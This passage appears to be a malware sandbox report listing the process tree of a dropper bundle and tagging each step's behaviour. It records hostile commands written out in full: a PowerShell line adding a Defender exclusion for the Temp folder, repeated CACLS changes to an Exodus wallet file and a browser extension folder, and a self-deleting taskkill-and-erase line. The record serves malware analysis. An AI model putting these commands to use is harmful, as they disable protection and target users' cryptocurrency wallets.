- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 14882⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bc939e5_Fri001f6e5e.exe620ee9bc939e5_Fri001f6e5e.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bc939e5_Fri001f6e5e.exeC:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bc939e5_Fri001f6e5e.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f6d521e_Fri005bb939a12f.exe620ee9f6d521e_Fri005bb939a12f.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f6d521e_Fri005bb939a12f.exe620ee9f6d521e_Fri005bb939a12f.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bdae9b2_Fri00129f9288f5.exe620ee9bdae9b2_Fri00129f9288f5.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bdae9b2_Fri00129f9288f5.exe"C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bdae9b2_Fri00129f9288f5.exe" -a2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f0f317f_Fri00dfd53221.exe620ee9f0f317f_Fri00dfd53221.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",3⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\sWmDPTD.CPL",5⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c09b72d_Fri00ef1dae.exe"C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c09b72d_Fri00ef1dae.exe" /SILENT1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S49F6.tmp\620ee9c09b72d_Fri00ef1dae.tmp"C:\Users\Admin\AppData\Local\Temp\is-S49F6.tmp\620ee9c09b72d_Fri00ef1dae.tmp" /SL5="$4004E,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c09b72d_Fri00ef1dae.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-LTAQE.tmp\dllhostwin.exe"C:\Users\Admin\AppData\Local\Temp\is-LTAQE.tmp\dllhostwin.exe" 773⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\is-FH1E5.tmp\620ee9f904e5f_Fri008a64a161.tmp"C:\Users\Admin\AppData\Local\Temp\is-FH1E5.tmp\620ee9f904e5f_Fri008a64a161.tmp" /SL5="$3002E,140006,56320,C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f904e5f_Fri008a64a161.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-5BPC0.tmp\5(6665____.exe"C:\Users\Admin\AppData\Local\Temp\is-5BPC0.tmp\5(6665____.exe" /S /UID=14052⤵
- Executes dropped EXE
-
C:\Windows\system32\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll3⤵
-
C:\Windows\system32\OptionalFeatures.EXE"C:\Windows\system32\OptionalFeatures.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-31M8T.tmp\620ee9c09b72d_Fri00ef1dae.tmp"C:\Users\Admin\AppData\Local\Temp\is-31M8T.tmp\620ee9c09b72d_Fri00ef1dae.tmp" /SL5="$40200,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c09b72d_Fri00ef1dae.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f4890f0_Fri00080e80.exe620ee9f4890f0_Fri00080e80.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f904e5f_Fri008a64a161.exe620ee9f904e5f_Fri008a64a161.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c20f6fc_Fri00f49041.exe620ee9c20f6fc_Fri00f49041.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f3162da_Fri00b5daea42.exe620ee9f3162da_Fri00b5daea42.exe /mixtwo1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 6242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 6322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 6602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 7402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 8402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 7802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 13002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 13242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "620ee9f3162da_Fri00b5daea42.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9f3162da_Fri00b5daea42.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "620ee9f3162da_Fri00b5daea42.exe" /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 9082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9c09b72d_Fri00ef1dae.exe620ee9c09b72d_Fri00ef1dae.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620ee9bce72ea_Fri00a1d5e5045.exe620ee9bce72ea_Fri00a1d5e5045.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exe4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Second.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\First.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\First.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
- Checks computer location settings
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E2⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3448 -ip 34481⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv nH9463f3FEyFDjHQwKe0uA.0.21⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 6003⤵
- Program crash
-
